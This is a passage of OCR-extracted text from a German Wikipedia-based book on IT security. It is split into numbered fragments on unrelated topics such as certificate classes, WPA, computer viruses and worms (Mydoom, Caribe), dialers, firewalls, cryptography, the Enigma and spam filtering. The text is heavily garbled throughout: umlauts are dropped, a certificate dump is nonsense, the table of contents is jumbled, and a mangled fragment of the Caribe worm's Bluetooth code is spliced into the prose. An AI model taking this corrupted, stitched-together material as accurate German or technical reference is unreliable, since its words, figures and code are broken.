341. in der Qualit t werden durch Klassen eingeteilt Klasse 0 Zertifikate sind in der Regel Demozertifikate mit kurzer G ltigkeitsdauer z B 30 Tage Sie k nnen genutzt werden um ei nen Gesch ftsprozess zu testen Klasse 1 Zertifikate best tigen die G ltigkeit einer angegebenen E Mail Adresse und dass der Besitzer des entsprechenden ffentli chen Schl ssels Zugriff auf diese E Mail Adresse hat Bei Klasse 2 Zertifikaten f r Unternehmen wird keine pers nliche Identit tsfeststellung vorgenommen Vielmehr reicht eine Kopie des Handelsregisterauszuges zur Feststellung der bevollm chtigten Per son und ein schriftlicher Auftrag Diese Zertifikate sind haupts ch lich f r die gesicherte Kommunikation zwischen einander bereits au erhalb des Internets bekannten Partnern gedacht 144 Digitales Zertifikat lesagsansmasatsadaTlasd4 053792saeil2lzeezer UG eridei6sii U5 70 ber DERG SRA 67 Vasidsrsos4es0n 3 50203 50288 16 dA cbise9 jidze3n2ezjebr 02 81 62 8f 7e 00 e1 37 67 3 36 45 04 38 44 44 77re9 0 B4295 f5 f9 34298 843 Exponent 65537 0x10001 X509v3 extensions X509v3 Subject Alternative Name email xyz anywhere com Netscape Comment modeeseilggenerstedstesisserverzeertlirieare Netscape Cert Type SSL Server Signature Algorithm md5WithRSAEncryption Tened kkps Sagas liso sic sas lela OO Sela gH sie Tels ILS SOS a Sloe SOAS Fel RelA Oe SWSRH SCS SD ACIIREGH Es Aires sells Ree 62 AUR Sle ARN
342. inalsprachigen Versionen dieser Hinweise und Haftungsausschl sse aufnehmen F r den Fall von Unstimmigkeiten zwischen der bersetzung und der Originalversion dieser Lizenz oder einem Hinweis oder Haftungsausschluss hat die Originalversion Vorrang Ist ein Abschnitt des Dokuments mit Danksagungen Widmungen oder Historie berschrieben verlangt die Bedingung Paragraph 4 den Titel zu erhalten Paragraph 1 typischerweise eine nderung des aktuellen Titels 9 SCHLUSSBESTIMMUNGEN Sie d rfen das Dokument nicht vervielf ltigen ver ndern sublizenzieren oder verbreiten es sei denn dass Sie es ausdr cklich unter diese Lizenz stellen Jeder andere Versuch das Dokument zu vervielf ltigen zu ver ndern zu sublizenzieren oder zu verbreiten ist unzul ssig und f hrt automatisch zum Entzug der durch diese Lizenz gew hrten Rechte Dennoch verlieren Parteien die von Ihnen Kopien oder Rechte erhalten haben die unter dieser Lizenz stehen nicht ihre Lizenzen solange sie sich in v lliger bereinstimmung damit befinden 10 K NFTIGE BERARBEITUNGEN DIESER LIZENZ Die Free Software Foundation kann von Zeit zu Zeit neue berarbeitete Versionen der GNU Free Documentation License ver ffentlichen Diese neuen Versionen werden den vorherigen im Geiste entsprechen k nnen aber in Details abweichen um neuen Problemen oder Fragestellungen gerecht zu werden Siehe http www gnu org copyleft 334 GNU Free Documentation License
343. indern aber das Ernten der E Mail Adresse 196 Spam Nutzung von BCC Um E Mail Adressen nicht unn tig zu verbreiten empfiehlt es sich E Mails an viele Empf nger an sich selbst zu adres sieren und die eigentlichen Empf nger in das BCC Feld zu nehmen Diese erhalten dann eine so genannte Blindkopie BCC Blind Carbon Copy Die Adressen im BCC Feld werden den Empf ngern nicht ber mittelt Ma nahmen f r Mailserverbetreiber Kann der einzelne Benutzer nur verhindern dass er selbst UBE erh lt bietet sich f r Administratoren von Mailservern die M glichkeit die Verbreitung von UBE einzuschr nken Dies beginnt bei der richtigen Konfiguration des Mailservers der es nur autorisierten Benutzern gestatten sollte E Mails zu verschicken Diese Ma nahme ist allerdings nur ein Tropfen auf den hei en Stein da UBE fast nie ber den Mail Server des Absenders sondern ber den des jewei ligen Empf ngers verschickt wird Auf der Gegenseite kann der Mailserver den Empfang von E Mails die von so genannten Open Relays stammen ber die jeder unautorisiert Mails einliefern kann ablehnen Mehrere Organisationen zum Beispiel die Open Relay Database bieten Listen solcher fehlkonfigurierter Mail server an die der Serveradministrator zur berpr fung nutzen kann Da sich offene Relays immer seltener finden ist eine mittlerweile weitaus effektivere M glichkeit das Anliefern durch Einwahlzug nge nur nach Authentifizierung zu ges
344. ine Per Packet Key Mixing Funktion einen Re Keying Mechanismus sowie einen Message Inte grity Check MIC namens Michael Die Authentifizierung ber EAP wird meist in gro en Wireless LAN Installationen genutzt da hierf r eine Authentifizierungsinstanz in Form eines Servers z B ein RADIUS Server ben tigt wird In kleineren Netz werken wie sie im SoHo Bereich Small Office Home Office h ufig auf treten werden meist PSK Pre Shared Keys genutzt Der PSK muss somit allen Teilnehmern des Wireless LAN bekannt sein da mit seiner Hilfe der Sitzungsschl ssel generiert wird Am 3 Februar 2004 wurde die Erweiterung von WPA angek ndigt In WPA2 wurde nicht nur der vollst ndige 802 11i Standard umgesetzt sondern es nutzt auch einen anderen Verschl sselungsalgorithmus AES Advanced Encryption Standard Hierbei ist zu erw hnen dass WPA f hige Ger te die AES beherrschen nicht unbedingt WPA2 unterst tzen Bei der Nutzung von Pre Shared Keys ist unbedingt auf die Qualit t des verwendeten Passworts zu achten Ein m glicher Angreifer kann ber die Brute Force Methode oder einen W rterbuchangriff das genutzte Passwort erraten und so alle m glichen Varianten des Pre Shared Keys generieren Um zu sehen welcher der generierten Keys der richtige ist muss ein Anmeldevorgang mitgeh rt werden welcher von einem An greifer jeder Zeit initiiert werden kann Bei jeder Anmeldung findet ein Schl sselaustausch statt der b
345. inem Linkvirus erst ein verseuchtes Skript auf sein System kopieren und ausf hren Mischformen Nicht alle Computerviren fallen eindeutig in eine spe zielle Kategorie Es gibt auch Mischformen wie zum Beispiel Viren die sowohl Dateien als auch Bootsektoren infizieren Beispiel Kernelviren oder Makroviren die auch Programmdateien infizieren k nnen Bei der Zusammensetzung ist beinahe jede Variation m glich Testviren Das Eicar Test File ist eine Datei die benutzt EI CAR STANDARD ANT IUIRUS TEST FILE wird um Virenscanner zu ji testen Sie ist kein Virus und Abb 3 Meldung des Eicar test files nach der Ausf hrung enth lt auch keinen viralen Inhalt sondern ist nur per Definition als Virus zu erkennen Jeder Viren scanner sollte diese Datei erkennen Sie kann deswegen benutzt werden um auf einem System das von keinem Virus infiziert wurde zu testen ob der Virenscanner korrekt arbeitet Infektionsarten Companion Viren Companion Viren infizieren nicht die ausf hrbaren Dateien selbst sondern benennen die urspr ngliche Datei um und erstel len eine Datei mit dem urspr nglichen Namen die nur das Virus enth lt oder sie erstellen eine Datei mit hnlichem Namen die vor der urspr ng lichen Datei ausgef hrt wird Es handelt sich also nicht um ein Virus im eigentlichen Sinne da kein Wirtsprogramm manipuliert wird Unter MS DOS gibt es beispielsweise Companion Viren die zu einer ausf hrbaren EXE Datei eine v
346. iner E Mail verschickt wird Dies wird durch das MIME Pro tokoll erm glicht welches die Unterteilung des Bodys und die Kodierung der Datei regelt Dateianh nge k nnen Computerviren beinhalten daher sollte sorgsam mit ihnen umgegangen werden Die Gr e eines Attach ments ist zwar prinzipiell nicht begrenzt wird aber in der Realit t durch Gr enbeschr nkungen f r die gesamte E Mail limitiert 184 E Mail Versand Verwendete Protokolle SMTP ist ein Protokoll zum Mailversand und Transport POP3 dient zum Abruf von Mails von einem Mailserver IMAP dient dazu auf Mailboxen zuzugreifen die auf Mailservern liegen UUCP ist ein Protokoll mit dem E Mails gesammelt werden und beim n chsten Verbindungsaufbau verschickt werden Es hat heute stark an Bedeutung verloren berwachung Inzwischen wird in vielen L ndern der E Mail Verkehr vom Staat ber wacht In Deutschland sind seit dem Jahr 2005 Internet Service Provider verpflichtet entsprechende Hard und Software vorzuhalten um einer berwachungsanordnung sofort Folge leisten zu k nnen ohne f r die daraus erwachsenden Kosten einen finanziellen Ausgleich zu erhalten Erste Internet Service Provider haben mit damit begr ndeten Preiserh hungen begonnen Benutzerschnittstelle Zur Nutzung von E Mail ben tigt man eine M glichkeit E Mails zu erzeugen und zu empfangen Hierf r gibt es mehrere M glichkeiten die im Folgenden aufgef hrt sind E Mail Programm Zur Nutz
347. iner eigenen SMTP Engine Ab diesem Zeitpunkt waren W rmer nicht mehr auf Microsoft Outlook Express 60 Computerwurm angewiesen Auch wurden die ersten W rmer entdeckt die sich via ICQ oder Peer to Peer Netzwerken verbreiten konnten Aber die wichtigste Erneuerung oder Wiederentdeckung seit dem Morris Wurm aus dem Jahr 1988 war das Ausnutzen von Sicherheits l chern oder Softwareschwachstellen in Programmen So erreichte der Wurm Code Red im Jahr 2001 eine gro e Verbreitung da er eine L cke in Microsofts Internet Information Server ausnutzt Durch das Ausnutzen von Schwachstellen konnten nun auch die ersten dateilosen W rmer in Erscheinung treten Sie verbreiteten sich durch Si cherheitsl cken und blieben nur im RAM nisteten sich also nicht auf die Festplatte ein Im Jahr 2002 wurde mit dem Wurm Slapper die bis dato am weitesten verbreitete Malware f r das Betriebssystem Linux geschrieben Das Ausnutzen von Sicherheitsl cken hielt auch in den Jahren 2003 und 2004 an Der Wurm SQL Slammer verbreitete sich sehr stark durch Aus nutzen einer Sicherheitsl cke im Microsoft SQL Server Bis dahin wurden Privat Anwender von dieser Art von W rmern verschont Das nderte sich im August 2003 als der Wurm W32 Blaster eine Sicherheitsl cke im Microsoft Windows Betriebssystem ausnutzte und mit einer gewaltigen Verbreitungswelle Schlagzeilen machte Im Jahr 2004 nutzte der Wurm Sasser ein hnliches Verfahren und griff damit a
348. ines anderer AV Unternehmen einsetzt Durch den Einsatz mehrerer Scanengines kann zwar die Erkennungsrate theoretisch gesteigert werden jedoch f hrt dies immer zu drastischen Performance Verlusten Es bleibt daher fragw rdig ob sich Virenscanner mit mehreren Scanengines als sinnvoll erweisen Das h ngt vom Sicherheitsanspruch bzw dem Anspruch an System Performance ab und muss von Fall zu Fall entschieden werden Heuristik Zwar verf gen einige Virenscanner ber die M glichkeit auch nach allgemeinen Merkmalen zu suchen Heuristik um unbekann te Viren zu erkennen oder sie bringen ein rudiment res Intrusion Detec tion System mit sich jedoch sind diese L sungen auch nicht immer ausrei chend Zu guter Letzt kann es auch passieren dass ein Angreifer f r einen Computer einen eigenen Wurm ein Virus oder auch h ufig einen eigenen Trojaner schreibt der nur einen bestimmten Rechner infiziert von die sem Virus Wurm Trojaner wird der Hersteller der Virenscanner nat r lich nie erfahren es gibt ja nur einen Vertreter weshalb die Virenscanner diesen auch nie finden k nnen Virenscanner sollten generell nur als Erg nzung zu allgemeinen Vor sichtsma nahmen betrachtet bzw eingesetzt werden Keine Schutzsoft ware kann 100 igen Schutz bieten weshalb Vorsicht und aufmerksames Handeln f r verantwortungsvolle Computernutzer unabdingbar sind Autoupdate Die so genannte Auto Internet oder auch Live Updatefunktion mit der au
349. ingespielt waren 109 Software In den Jahren 2002 und 2003 wurden dubiose Dialer auch mit Hilfe angeb licher Virenschutzprogramme bei ahnungslosen Internetnutzern instal liert Werbe Mails von einem angeblichen AntiVirus Team enthielten z T im Betreff den Zusatz Weiterleiten bewarben aber per Download Link ein Programm namens downloadtool exe oder antivirus exe das in Wirklichkeit einen 0190 Dialer darstellte Eine andere Masche waren E Mails in denen dem Empf nger f r seine Hilfe und Unterst tzung ge dankt wurde und er per Klick einen Blick auf die neue Webseite werfen sollte Wer seine Neugier nicht z geln konnte auf den wartete dann ein Dialer Download Weiter gab es Gru karten Mails in denen ein Link an gegeben war der eine Webseite ffnete auf der den Nutzern des Internet Explorers ein ActiveX Plug In aufgen tigt wurde das wiederum heimlich einen Dialer installierte Um Missbr uchen und vor allem ihren rechtlichen Konsequenzen f r den Nutzer vorzubeugen ist daher eine umfangreiche Rechtspre chung entstanden und schlie lich auch ein neues Gesetz Mehrwert dienstegesetz MWD Gesetz verabschiedet worden das regelt welche Bedingungen ein Dialer erf llen muss damit der Nutzer auch zur Zahlung des Entgelts verpflichtet ist Seither sind 0190 Dialer grund s tzlich nicht mehr zul ssig alle Dialer m ssen mit 0900 9 anfangen Weiterhin m ssen alle Dialer bei der Regulierungsbeh rde f r T
350. ion zu Digital Rights Manage ment Systemen DRMS Im Allgemeinen bezeichnet man eine Bandbreite von Technologien mit dem Begriff Digital Rights Management Hauptan reiz f r die Entwicklung von Digital Rights Management Systemen war der Schutz der Urheberrechte am geistigen Eigentum s o an Bild Ton und Videoaufnahmen Mittlerweile finden DRMS auch in vielen anderen Berei chen Anwendung z B in Unternehmen um Dokumente zu sch tzen 127 Software Die Vielzahl der Definitionen lassen sich in weitgreifende und engere De finitionen unterteilen Hier seien zwei vorgestellt Weitgreifende Definition Digital Rights Management Systeme stel len eine technische Sicherheitsma nahme dar um einem Rechteinhaber von Informationsg tern die M glichkeit zu geben die Art der Nutzung seines Eigentums durch Nutzer auf Basis einer zuvor getroffenen Nut zungsvereinbarung technisch zu erzwingen Zu DRMS geh ren im All gemeinen auch Watermarking Technologien Allerdings bieten diese nur eingeschr nkte M glichkeiten zur Nutzungskontrolle z B Einsatz von fragilen Wasserzeichen welche die Darstellung oder das Abspielen von kopierten Inhalten in besonderen Abspielger ten verhindern Engere Definition Die elektronischen Schutzmechanismen f r di gitale Informationen werden DRMS genannt Sie erm glichen die Ver wertung von digitalen Inhalten ber eine reine Pauschalverg tung hinaus und erlauben zus tzlich die individuelle Lizenzierung Ab
351. ird Manche dieser Prozesse geh ren zum Betriebssystem und sind f r Internetverbindungen notwendig Bei der Definition der Regeln nach der zuletzt genannten Grundhaltung werden zun chst so wenige Prozesse wie m glich freigegeben Funktio niert danach eine Software nicht mehr wie erwartet so kann das Log nach gesperrten Verbindungen durchsucht werden um den zu der behinderten Software geh renden Prozess freizugeben Bei unbekannten Prozessen empfiehlt es sich nach weiteren Informationen zu forschen um zu kl ren wozu dieser Prozess geh rt 102 Personal Firewall Personal Firewall Software Windows Firewall Die Windows Firewall ist Bestandteil von Windows XP Sie wird bei der Installation des Service Packs 2 oder bei der Windows installation von einem Datentr ger mit integriertem engl slipstreamed Service Pack 2 automatisch aktiviert Sie verwirft eingehende Verbindun gen und fragt beim Start von Programmen die Server Dienste anbieten bei Benutzern die ber Administratorrechte verf gen nach ob eingehen de Verbindungen zu den von diesen Programmen ge ffneten Ports erlaubt werden sollen Sie kann ber das Sicherheitscenter der ebenfalls mit Ser vice Pack 2 hinzugekommenen zentralen Verwaltungsstelle f r Personal Firewalls und Virenscanner oder ber die Datei Namens NETFW INF konfiguriert werden Dort kann man in zwei Profilen Ausnahmelisten f r bestimmte Ports und Programme erstellen
352. ird er meistens schnell von einem aufmerksamen Mitleser beseitigt Das ist etwas das auf einer statischen Buchseite nicht reproduziert werden kann Sie k nnen dem Verlag der die Enzyklop die herausgegeben hat zwar um eine Korrektur bitten aber Sie k nnen sich nicht sicher sein dass dies auch getan wird In der Wikipedia k nnen und d rfen Sie derartige Kor rekturen jederzeit selbst vornehmen Sie werden sogar darum gebeten Um auch Ihnen den Buchlesern Korrekturen zu erm glichen ent h lt dieser Band eine Besonderheit Die Edit Card Auf ihr k nnen Sie Korrekturen Verbesserungsvorschl ge erweiternde Informationen oder einfach Ihre Meinung an unseren Verlag einsenden Unsere Redaktion pflegt Ihren Beitrag dann entsprechend in der Wikipedia im Internet ein Vielleicht wird Ihnen nach der Lekt re des Buches wenn Sie sich in das Abenteuer Wikipedia im Internet st rzen der eine oder andere Artikel auffallen der im Wortlaut nicht exakt dem dieses Buches entspricht Kein Wunder die Inhalte der Wikipedia sind st ndig im Fluss Ihre Nutzer le sen und arbeiten rund um die Uhr Sie korrigieren grammatikalische Feh ler ersetzen ein falsches Wort durch ein korrektes sie erg nzen wichtige Informationen oder beseitigen eine sachlich falsche Aussage Dieses Buch dokumentiert nur einen kleinen Mosaikstein aus diesem gro en Projekt Es pr sentiert ein Thema dass mit einer f r eine Buch publikation gew nschten Informationstiefe
353. irma zusenden 154 Selbstdatenschutz Ein junger Mann bewirbt sich um eine Anstellung bei einem internatio nal t tigen Unternehmen Dieses Unternehmen arbeitet mit einer illegal t tigen Auskunftei zusammen Durch gezieltes Phishing Pharming und Spoofing werden alle webbasierten Accountdaten der Zielperson verdichtet und ausgewertet Dabei stellt sich heraus dass die Zielperson bei einem Kontaktportal ein schwules Profil unterh lt aufgrund psy chischer Probleme mehrere Anfragen an webbasierte Onlineberatun gen gerichtet hat und es zu regelm igen Konto berziehungen kommt Bei einem Internet Auktionshaus tritt die Zielperson durch regelm i ges Aufkaufen von M nzen und Second Hand Jeans in Erscheinung Die verdichteten Profildaten reichen der zust ndigen Personalabteilung aus um die eingereichte Bewerbung negativ zu bescheiden Die Passw rter zur Abfrage von Mailservern werden in der Regel ohne Verschl sselung im Netz transferiert So ist es m glich weltweit auf die Mailbox eines Ratsuchenden zuzugreifen Bei sensiblen Themen wird der E Mailnutzer somit erpressbar Die meisten Verbraucher kennen die Gefahren nicht die damit verbunden sind pers nliche Daten herauszugeben Erschwerend kommt hinzu dass die meisten Internetnutzer der f lschlichen Meinung sind das Internet w re anonym Sie sind sich der Bedrohungen eines in Wirklichkeit offe nen Netzes nicht bewusst In einer Informationsgesellschaft bedarf es somit
354. irus Der Form Virus war lange Zeit einer der verbreitetsten Computerviren Beim Form Virus handelt es sich um einen Bootvirus der sich ber Disketten verbreitet Es wird vermutet dass der Virus aus der Schweiz stammt Sobald eine infizierte Diskette in einen Computer gesteckt wird installiert sich der Virus selbstst ndig in den gesch tzten Speicher Dabei werden vom DOS Speicher 2 KB reserviert Danach wird der Bootsek tor der Harddisk infiziert wobei der Originalinhalt in die letzten beiden Sektoren geschrieben wird Dies hat zur Folge dass der Virus nach jedem Neustart des Computers sofort wieder aktiviert wird Von da an wird jede eingelegte Diskette infiziert wobei der originale Bootsektor berschrieben wird Jeden 24 Tag im Monat pr sentiert sich der Virus in Form von Tas tatur Klicken Der Programm Code enth lt au erdem folgenden Text The FORM Virus sends greetings to everyone who s reading this text FORM doesn t destroy data Don t panic Fuckings go to Co rinne Vom Form Virus sind au erdem folgende Varianten bekannt FORM C Das Tastatur Klicken kommt nur im Mai vor FORM D Der Viruscode ist direkt hinter der Partitionstabelle gespeichert Da heutzutage nur noch selten Disketten ben tigt werden ist der Virus so gut wie ausgestorben Moderne BIOS Varianten sind zus tzlich mit einem Schutz f r das berschreiben des Harddisk Bootsektors ausger stet Quelle http de wikipedia org wiki Form Virus Historie 30
355. ische Verschl sselung Entscheidend f r die Sicherheit der Verschl sselung gegen unbefugte Entzifferung sind die Geheimhaltung der Walzenverdrahtung sowie die Anzahl der im Walzen satz verwendeten Walzen Das Letztere ist ein ganz wichtiger Faktor der die wesentlich st rkere Verschl sselung der bei den deutschen U Booten eingesetzten Vierwalzen Enigma M4 im Vergleich zur Enigma I mit nur drei Walzen erkl rt Mit Hilfe der doppelpoligen Steckkabel die von vorne in das Stecker brett gesteckt werden k nnen lassen sich Buchstaben vor und nach Durch laufen des Walzensatzes paarweise involutorisch vertauschen Diese Ma nahme diente zur weiteren St rkung der kryptografischen Sicherheit der Enigma Tats chlich wird hierdurch der Schl sselraum betr chtlich erweitert Da die Steckeranordnung jedoch w hrend des gesamten Ver schl sselungsvorgangs konstant bleibt und nicht wie der Stromfluss durch den Walzensatz variabel ist bewirkt sie nur einen geringen Schutz und kann durch den Angreifer abgestreift werden Die Ringe Ringstellung dienten haupts chlich zum Schutz vor Spio nage und sind krytografisch nahezu bedeutungslos Durch sie wurde ver hindert dass durch Ablesen der von au en sichtbaren Walzenstellung auf die interne Position der Walzen geschlossen werden konnte 300 Enigma Schl sselraum Der Schl sselraum der Enigma l sst sich aus den einzelnen Komponen ten des Schl ssels sowie der Anzahl der unterschiedliche
356. ise eine statistische Verteilung bestimmter Zeichen Datenintegrit t der Nachricht Der Empf nger sollte in der Lage sein festzustellen ob die Nachricht seit ihrer bertragung ver ndert wurde Authentifizierung Der Empf nger sollte den Absender eindeutig iden tifizieren k nnen Weiterhin sollte berpr fbar sein ob die Nachricht tats chlich von diesem Absender stammt Verbindlichkeit Der Absender sollte nicht in der Lage sein zu bestrei ten dass er die Nachricht gesendet hat Nicht alle kryptografischen Systeme und Algorithmen erreichen alle der oben genannten Ziele Manche Ziele sind in gewissen Umgebungen ein fach nicht praktikabel oder sogar berfl ssig Zudem ben tigen sie oft komplizierte Protokolle und rechenintensive Algorithmen die nicht in jeder Situation eingesetzt werden k nnen Obwohl die Kryptografie eine lange und komplexe Geschichte hat entwickelte sie sich erst im 20 Jahrhundert zur rigorosen und von Ma thematikern unterst tzten Wissenschaftsdisziplin Aber erst mit den Kommunikationsm glichkeiten des Internets kam sie in den allgemeinen jedermann zug nglichen Gebrauch 267 Kryptografie Klassische Kryptografie Der fr heste Einsatz von Kryptografie findet sich bei dem Einsetzen von un blichen Hieroglyphen bei den gyptern um 1900 v Chr Hebr ische Gelehrte benutzten ungef hr 600 500 v Chr einfache Zeichenaustauschal gorithmen wie beispielsweise die Atbash Verschl sselung Im Mittelalter
357. isher am schnellsten und weitesten verbreiteten Computer Wurm der den bisheri gen Rekord des Sobig Wurms noch bertrifft Mydoom wird vorwiegend ber E Mail bertragen und gibt sich ge gen ber dem Empf nger als bertragungsfehler bei der Mailzustellung aus Im Betreff der E Mails tauchen Meldungen auf wie Error Mail Delivery System Test Delivery Status Notification oder Mail Trans action Failed In den deutschen Varianten kommen auch Betreffzeilen wie Benachrichtigung zum bermittlungsstatus Fehlgeschlagen und hnliche Meldungen vor An die E Mail angeh ngt ist eine Datei mit dem Wurm Wird der An hang ausgef hrt installiert sich der Wurm im Windows Betriebssystem Dabei durchsucht der Wurm lokale Dateien sowie das Windows Adress buch des befallenen Rechners nach E Mail Adressen und versendet sich an diese Weiterhin legt der Wurm eine Kopie seiner selbst im Ordner Ge meinsame Dateien des Peer to Peer Datentauschprogramms Kazaa ab Beim Versand der verseuchten Mails schlie t der Wurm jedoch Ziel adressen von diversen Universit ten wie die Rutgers Universit t das MIT Stanford und UC Berkeley sowie verschiedene Firmen wie Microsoft und 65 Viren W rmer Trojaner Symantec aus Behauptungen aus fr heren Berichten der Wurm w rde generell alle edu Adressen ausschlie en haben sich als falsch heraus gestellt Die Original Version des Wurms Mydoom A infiziert Rechner auf z
358. iste Sonstige Themen Selbstdatenschutz Vorratsdatenspeicherung 157 163 164 168 169 170 171 Chaos Computer Club Web Bug HTTP Cookie Backdoor Hoax x Skriptkiddie Cracker 133 133 134 136 140 154 154 156 5 Hacker e 175 Pr fsumme s 257 E Mail 181 Zyklische An die Leserinnen und Leser dieses Buchs E Mail Uberwachung 187 Redundanzpriifung 259 Spam 188 Erinnern Sie sich bitte an Ihre jiingsten Leseerfahrungen mit Sach oder Kryptografie 267 Fachliteratur Haben Sie sich gefragt wodurch sich die Autoren legiti Angriffe 208 Kryptografie 267 mieren Gehen wir einmal davon aus dass Biicher in aller Regel von Denial of Service 208 Kryptologie 271 Fachleuten geschrieben werden Sie werden Ihnen an exponierter Stelle Defacement 212 Kryptoanalyse 272 im Buch vorgestellt ihre Qualifikation ergibt sich aus ihrer derzeitigen Hijacking 212 Symmetrisches Besch ftigung aus ihrer dokumentierten fachlichen Erfahrung und aus Phreaking s 213 Kryptosystem 276 der Liste ihrer bisherigen Buchver ffentlichungen So gibt es letztlich Smurf Attacke 215 Asymmetrisches keine Zweifel daran dass die Informationen der Autorin oder des Autors SQL Injektion 215 Kryptosystem 277 es lohnen gedruckt zu werden So weit so gut Wir hoffen
359. iteratur Bundesamt f r Sicherheit in der Informationstechnik Sicherheit im Funk LAN WLAN IEEE 802 11 Medosch Armin Freie Netze Geschichte Politik und Kultur offener WLAN Netze Heise Hannover 2004 ISBN 3 936931 10 0 Das Buch steht unter einer Creative Commons Lizenz und kann heruntergeladen werden Otto Thomas Netzwerkauthentifizierung im WLAN TU Braunschweig April 2004 Radmacher Mike Sicherheits und Schwachstellenanalyse entlang des Wireless LAN Protokollstacks Roth Jorg Mobile Computing dpunkt Heidelberg 2005 ISBN 3 89864 366 2 Sauter Martin Grundkurs Mobile Kommunikationssysteme September 2004 ISBN 3 528 05886 2 Quelle http de wikipedia org wiki Wireless_LAN Historie 1 2 03 Angelegt von Finex danach bearbeitet von den Hauptautoren Daniel Wimpff Neuroposer TobiasEgg Pitz Endorphine Kleinbahner BeziehungsWeise Rumbel Guillermo MichaelDiederich Wittkowsky Captain Crunch Stern Head Eddia Gimbal RokerHRO Da Thomas Arensmann Flothi Stefan Ruehrup Frubi Quirin Fxb Dickbauch Steven Malkovich KUI Matth us Wander Harald Spiegel Mwka Achim Raschka Kurt Jansson Priwo Haeber Wiki Hypo Baikonur Expose GFJ TomK32 Michael Strunck Phrood Cljk Appaloosa anonym 12 1 06 1 2 06 WikiPress Redaktion Wired Equivalent Privacy Wired Equivalent Privacy WEP ist der ehemalige Standard Verschl s selungsalgorithmus fiir WLAN Er soll sowohl den Zugang zum Netz re
360. itergaben Ber hmte Hacker Technikfachleute Ken Thompson und Dennis Ritchie erfanden in den fr hen 1970er Jahren die heute am meisten verbreitete Programmiersprache C und entwickelten 1969 Unix Richard Stallman ist unter anderem Gr nder der Free Software Foun dation FSF Eric S Raymond ist Autor und Programmierer von Open Source Soft ware Linus Torvalds begann 1991 die Entwicklung des Linux Kernels Tron wies die F lschbarkeit von GSM Karten nach und entwickelte ein verschl sselungsf higes und preiswertes ISDN Telefon John T Draper alias Cap n Crunch war der erste Phreaker bzw Telefon hacker Er schaffte es kostenlos zu telefonieren und entdeckte weitere Methoden zur Manipulation von Telefonleitungen Ethische Hacker Wau Holland Mitbegr nder des Chaos Computer Clubs 1981 Loyd Blankenship Autor des Artikels The Conscience of a Hacker Kriminelle Cracker Robert Tappan Morris schrieb 1988 den Morris Wurm Kevin Mitnick ist ein f r Social Engineering bekannter Hacker der erst nach mehreren Jahren Flucht vom FBI gefasst werden konnte Karl Koch brach Ende der 1980er Jahre zusammen mit Markus Hess in milit rische US Netzwerke ein um Daten an den KGB zu verkaufen anfangs aus ideellen Gr nden und Neugier sp ter um dadurch seine Drogensucht zu finanzieren Kevin Poulsen manipulierte Telefonanlagen von Radiosendern um bei Gewinnspielen Autos Reisen und Geld zu gewinnen wurde sp ter vom FBI verhaftet 180 E M
361. itet Handyw rmer Handyw rmer sind die neueste Art von W rmern Zuerst aufgetreten sind sie im Juni 2004 Die derzeitigen Handyw rmer verbreiten sich meist ber Bluetooth eine kabellose Verbindung zwischen Handys Druckern Scannern oder sogar Bordcomputern von Autos mit einer Reichweite von ungef hr zehn Metern Handyw rmer greifen das 54 Computerwurm Betriebssystem Symbian int CaribeBluetooth HanageFoundDevices OS an und versuchen if Withaddress r sich selbst mit Bluetooth Withnddress 8 a Cancel an alle erreichbaren TBTSockAddr btaddr entry inddr 7 TBTDeunddr devaddr Bluetooth Empfanger zu devAddr btaddr BTAddr R r TObexBluetoothProtocolinfo obexBTProtolnfo schicken Wie im Com obexBTProtoInfo iTransport Copy _L RFCOMM obexBTProtoInfo iAddr SetBTAddr devAddr putersektor so vermu obexBTProtoInfo iAddr SetPort Gx 98808889 de obexClient C bexClient NewL obexBTProtolnfo ten Antivirenhersteller if obexciient werden im Handybe siate oie reich immer mehr Viren us und W rmer auftreten obexClient gt Connect iStatus Setactive Seit dem Jahr 2005 ist es 3 auch m glich dass sich 21 Handyw rmer durch a 5888 MMS verbreiten Die derzeitigen Handyw r mer sind noch zu trivial Abb 6 Codeteil von Caribe dem ersten Handywurm um als wirkliche Gefahr verbreitet sich via Bluetooth zu gelten Auch ist noch kein Handywurm in the wild offizi
362. jedoch erst sp t und wohl nur vereinzelt zum Einsatz kam Weitere kryptografische St rkungen der Enigma w ren im Konstruktionsstadium relativ leicht m glich gewesen In erster Linie h tte man die Beschr nkung auf fixpunktfreie Permutationen vermeiden m ssen Auch die Involutorik wenn auch bequem f r die Bedienung schw chte die Maschine enorm Beides w re vermieden worden h tte man auf die Umkehrwalze verzichtet Interessanterweise verf gte bereits eine fr he Vorl uferin der Enigma I ber acht nebeneinander fest angeordnete nicht austauschbare Walzen und einen allein durch die Grundstellung einstellbaren Schl sselraum von mehr als 200 Milliarden im Gegensatz zu nur 17 576 Grundstel lungen der Enigma I Zudem verf gte dieses Enigma Modell ber keine Umkehrwalze hatte also auch nicht deren Schw chen H tte man diese Grundkonstruktion mit acht statt nur drei Walzen auf die Enigma I bertragen und wie dort die Lage der Walzen austauschbar gestaltet w re eine deutlich st rkere Maschine entstanden Eine weitere sehr einfache M glichkeit die Maschine sicherer zu gestalten ist die Verwendung von mehr als einer bertragskerbe Diese Kerben sind Bestandteil jeder Walze und bewirken den bertrag auf die n chste im Walzensatz weiter links liegende Walze und sorgen so f r die Fortschaltung der Rotoren Den Codeknackern kam es sehr gelegen dass sie 26 Buchstaben lang davon ausgehen konnten dass allein die rechte Wa
363. kannt und gelangen trotzdem in den Posteingang man spricht von false negatives Auch der andere Fehler ist m glich Erw nschte Mails k nnen durch zu strenge Filter als Spam ein gestuft so genannte false positives werden und erreichen so den Empf n ger nicht oder nur verz gert Lediglich gut konfigurierte Spamfilter die der Benutzer auf sich per s nlich zugeschnitten hat haben hohe Erfolgsquoten In solchen F llen lassen sich False Positives fast ganz ausschlie en und False Negatives auf unter 1 dr cken Allerdings ist der Einmalaufwand f r den Benutzer hoch und erfordert eine gewisse Erfahrung Zudem ist durch immer neue Methoden der Filter st ndig zu verbessern und zu erweitern Au erdem haben Filter durch die besprochenen Fehlerraten die immer vorhanden sind das Manko dass der Benutzer die E Mails die herraus gefiltert wurden im Zweifelsfall noch einmal nachkontrolieren muss und der eigentliche Zweck des Filters sich lediglich darauf beschr nkt eine Vorauswahl f r den Benutzer zu treffen Zudem ist Filtern unter Umst nden rechtlich kritisch Filtert der Pro vider oder Arbeitgeber ohne Einwilligung des Nutzers kann er unter Um st nden einen Straftatbestand verwirklichen Schwarze und graue Listen RBL und Greylisting RBL Server sind Server auf den die Adressen bekannter Spamversender in Echtzeit gesammelt werden Realtime Blackhole List Der Server f r eingehende Mail kann diese Server anfragen bevor er ein
